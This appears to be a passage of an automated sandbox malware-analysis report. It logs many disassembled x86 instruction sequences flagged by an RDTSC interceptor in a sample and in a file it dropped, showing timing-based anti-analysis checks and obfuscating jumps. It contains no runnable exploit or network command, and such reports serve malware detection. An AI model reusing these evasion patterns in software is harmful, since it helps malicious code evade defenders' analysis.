              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90713 second address: 4C90776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDE8C51D4E4h 0x00000013 sbb cx, 9908h 0x00000018 jmp 00007FDE8C51D4DBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FDE8C51D4E6h 0x00000026 sub ax, 3B68h 0x0000002b jmp 00007FDE8C51D4DBh 0x00000030 popfd 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90776 second address: 4C90793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call dword ptr [76C886D4h] 0x0000000b mov edi, edi 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 push FFFFFFFEh 0x00000012 push 774FCA08h 0x00000017 push 7746AE00h 0x0000001c mov eax, dword ptr fs:[00000000h] 0x00000022 push eax 0x00000023 sub esp, 0Ch 0x00000026 push ebx 0x00000027 push esi 0x00000028 push edi 0x00000029 mov eax, dword ptr [7751B370h] 0x0000002e xor dword ptr [ebp-08h], eax 0x00000031 xor eax, ebp 0x00000033 push eax 0x00000034 lea eax, dword ptr [ebp-10h] 0x00000037 mov dword ptr fs:[00000000h], eax 0x0000003d mov dword ptr [ebp-18h], esp 0x00000040 mov eax, dword ptr fs:[00000018h] 0x00000046 test eax, eax 0x00000048 je 00007FDE8CECEB11h 0x0000004e mov dword ptr [ebp-04h], 00000000h 0x00000055 mov edx, dword ptr [ebp+08h] 0x00000058 mov dword ptr [eax+00000BF4h], edx 0x0000005e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000065 test edx, edx 0x00000067 je 00007FDE8CE8B569h 0x0000006d xor edx, edx 0x0000006f jmp 00007FDE8CE8B4A8h 0x00000071 mov eax, edx 0x00000073 mov ecx, dword ptr [ebp-10h] 0x00000076 mov dword ptr fs:[00000000h], ecx 0x0000007d pop ecx 0x0000007e pop edi 0x0000007f pop esi 0x00000080 pop ebx 0x00000081 mov esp, ebp 0x00000083 pop ebp 0x00000084 retn 0004h 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007FDE8CE8B4D0h 0x0000008e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90793 second address: 4C907F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE8C51D4E1h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 jmp 00007FDE8C51D4E4h 0x00000019 popad 0x0000001a jg 00007FDEFE4BB19Ah 0x00000020 pushad 0x00000021 mov ecx, 781F32EDh 0x00000026 jmp 00007FDE8C51D4DAh 0x0000002b popad 0x0000002c js 00007FDE8C51D577h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FDE8C51D4DAh 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C907F3 second address: 4C90802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90802 second address: 4C9083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FDE8C51D4E3h 0x00000014 pop esi 0x00000015 mov dx, 598Ch 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9083E second address: 4C90860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDEFEE2910Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90860 second address: 4C90864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90864 second address: 4C90868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90868 second address: 4C9086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9086E second address: 4C908FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c jmp 00007FDE8CE8B4D0h 0x00000011 lea eax, dword ptr [ebp-2Ch] 0x00000014 jmp 00007FDE8CE8B4D0h 0x00000019 xchg eax, esi 0x0000001a jmp 00007FDE8CE8B4D0h 0x0000001f push eax 0x00000020 jmp 00007FDE8CE8B4CBh 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 mov edx, esi 0x00000029 mov edx, eax 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov bl, 16h 0x00000032 pushfd 0x00000033 jmp 00007FDE8CE8B4D0h 0x00000038 and eax, 04556328h 0x0000003e jmp 00007FDE8CE8B4CBh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C908FA second address: 4C90900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90900 second address: 4C90904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90904 second address: 4C90908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90908 second address: 4C90917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ah, bh 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90917 second address: 4C9093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8C51D4DDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9093C second address: 4C9096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ax, 8273h 0x0000000f mov ax, D2CFh 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 movsx ebx, cx 0x00000019 call 00007FDE8CE8B4CCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90191 second address: 4C901A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C901A0 second address: 4C901A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C901A6 second address: 4C901AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C901AA second address: 4C901AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D94 second address: 4C90E9E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDE8C51D4E6h 0x00000008 sbb cx, 2D98h 0x0000000d jmp 00007FDE8C51D4DBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FDE8C51D4E6h 0x0000001c push eax 0x0000001d jmp 00007FDE8C51D4DBh 0x00000022 xchg eax, ebp 0x00000023 jmp 00007FDE8C51D4E6h 0x00000028 mov ebp, esp 0x0000002a jmp 00007FDE8C51D4E0h 0x0000002f cmp dword ptr [76C8459Ch], 05h 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FDE8C51D4DEh 0x0000003d jmp 00007FDE8C51D4E5h 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FDE8C51D4E0h 0x00000049 add ah, 00000018h 0x0000004c jmp 00007FDE8C51D4DBh 0x00000051 popfd 0x00000052 popad 0x00000053 je 00007FDEFE4AB07Ah 0x00000059 pushad 0x0000005a mov dl, ch 0x0000005c push eax 0x0000005d push edx 0x0000005e pushfd 0x0000005f jmp 00007FDE8C51D4E7h 0x00000064 or eax, 4BEF308Eh 0x0000006a jmp 00007FDE8C51D4E9h 0x0000006f popfd 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90E9E second address: 4C90EBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90EBA second address: 4C90EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90EBE second address: 4C90EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90EC2 second address: 4C90EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0084 second address: 4CA0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0096 second address: 4CA009A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA009A second address: 4CA00C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FDEFEE10F96h 0x0000000d push 76C22B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [76C84538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 jmp 00007FDE8CE8B4D7h 0x00000057 sub esi, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA00C6 second address: 4CA00D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0819 second address: 4CB082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB082F second address: 4CB0833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0833 second address: 4CB084E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB084E second address: 4CB0877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4DFh 0x00000009 jmp 00007FDE8C51D4E3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0877 second address: 4CB0893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4D2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0893 second address: 4CB090A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDE8C51D4E6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FDE8C51D4E2h 0x0000001f adc cx, 64D8h 0x00000024 jmp 00007FDE8C51D4DBh 0x00000029 popfd 0x0000002a mov ecx, 638EFF8Fh 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FDE8C51D4E5h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov bh, 4Ch 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB090A second address: 4CB09B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FDE8CE8B4CEh 0x00000011 test esi, esi 0x00000013 jmp 00007FDE8CE8B4D0h 0x00000018 je 00007FDEFEDF8F3Bh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FDE8CE8B4CEh 0x00000025 or eax, 19B92B28h 0x0000002b jmp 00007FDE8CE8B4CBh 0x00000030 popfd 0x00000031 mov eax, 41CA381Fh 0x00000036 popad 0x00000037 cmp dword ptr [76C8459Ch], 05h 0x0000003e jmp 00007FDE8CE8B4D2h 0x00000043 je 00007FDEFEE10FD4h 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007FDE8CE8B4CEh 0x00000050 xor cl, FFFFFFB8h 0x00000053 jmp 00007FDE8CE8B4CBh 0x00000058 popfd 0x00000059 popad 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB09B6 second address: 4CB09BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB09BA second address: 4CB09C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB09C0 second address: 4CB09C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB09FB second address: 4CB0A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0A01 second address: 4CB0A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDE8C51D4E0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, ah 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0A33 second address: 4CB0A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0A39 second address: 4CB0A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edi 0x00000011 mov cx, bx 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 55E437 second address: 55DCAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+122D252Eh], edx 0x00000012 push dword ptr [ebp+122D0BD1h] 0x00000018 sub dword ptr [ebp+122D3BCEh], ebx 0x0000001e call dword ptr [ebp+122D25E8h] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D283Dh], ecx 0x0000002b xor eax, eax 0x0000002d mov dword ptr [ebp+122D283Dh], edx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 add dword ptr [ebp+122D2802h], eax 0x0000003d sub dword ptr [ebp+122D2825h], edi 0x00000043 mov dword ptr [ebp+122D2D72h], eax 0x00000049 cld 0x0000004a mov esi, 0000003Ch 0x0000004f sub dword ptr [ebp+122D2825h], ecx 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 jmp 00007FDE8CE8B4CAh 0x0000005e clc 0x0000005f lodsw 0x00000061 jmp 00007FDE8CE8B4CAh 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jmp 00007FDE8CE8B4CCh 0x0000006f mov ebx, dword ptr [esp+24h] 0x00000073 jmp 00007FDE8CE8B4D1h 0x00000078 nop 0x00000079 jmp 00007FDE8CE8B4D7h 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007FDE8CE8B4CFh 0x00000086 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 55DCAC second address: 55DCB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E20D2 second address: 6E20F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDE8CE8B4CCh 0x0000000b jne 00007FDE8CE8B4C6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E20F1 second address: 6E2104 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDE8C51D4DAh 0x0000000e rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E23EB second address: 6E23EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E537E second address: 6E5382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5382 second address: 6E5390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FDE8CE8B4C6h 0x0000000e rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5390 second address: 6E5394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5394 second address: 6E53A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c jo 00007FDE8CE8B4CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E53A8 second address: 6E53C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4DEh 0x00000013 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E53C4 second address: 6E53D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FDE8CE8B4C6h 0x00000014 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E53D8 second address: 55DCAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 and edi, 2AF72374h 0x0000000e push dword ptr [ebp+122D0BD1h] 0x00000014 cmc 0x00000015 call dword ptr [ebp+122D25E8h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D283Dh], ecx 0x00000022 xor eax, eax 0x00000024 mov dword ptr [ebp+122D283Dh], edx 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e add dword ptr [ebp+122D2802h], eax 0x00000034 sub dword ptr [ebp+122D2825h], edi 0x0000003a mov dword ptr [ebp+122D2D72h], eax 0x00000040 cld 0x00000041 mov esi, 0000003Ch 0x00000046 sub dword ptr [ebp+122D2825h], ecx 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 jmp 00007FDE8C51D4DAh 0x00000055 clc 0x00000056 lodsw 0x00000058 jmp 00007FDE8C51D4DAh 0x0000005d add eax, dword ptr [esp+24h] 0x00000061 jmp 00007FDE8C51D4DCh 0x00000066 mov ebx, dword ptr [esp+24h] 0x0000006a jmp 00007FDE8C51D4E1h 0x0000006f nop 0x00000070 jmp 00007FDE8C51D4E7h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FDE8C51D4DFh 0x0000007d rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E54E0 second address: 6E54F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5533 second address: 6E5538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5538 second address: 6E5587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add edi, 67175A91h 0x00000012 push 00000000h 0x00000014 call 00007FDE8CE8B4D8h 0x00000019 pushad 0x0000001a mov di, dx 0x0000001d mov si, 7646h 0x00000021 popad 0x00000022 pop edi 0x00000023 push 00864FB4h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FDE8CE8B4D1h 0x00000030 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeRDTSC instruction interceptor: First address: 6E5587 second address: 6E564E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 00864F34h 0x0000000e push 00000003h 0x00000010 sbb dh, 00000031h 0x00000013 mov edi, 6B53D800h 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b or dword ptr [ebp+122D39ACh], eax 0x00000021 popad 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FDE8C51D4D8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e jmp 00007FDE8C51D4DBh 0x00000043 jnc 00007FDE8C51D4D9h 0x00000049 call 00007FDE8C51D4D9h 0x0000004e jo 00007FDE8C51D4E2h 0x00000054 jmp 00007FDE8C51D4DCh 0x00000059 push eax 0x0000005a jmp 00007FDE8C51D4E5h 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 jmp 00007FDE8C51D4E2h 0x00000068 mov eax, dword ptr [eax] 0x0000006a jmp 00007FDE8C51D4E5h 0x0000006f mov dword ptr [esp+04h], eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jg 00007FDE8C51D4DCh 0x0000007b rdtsc
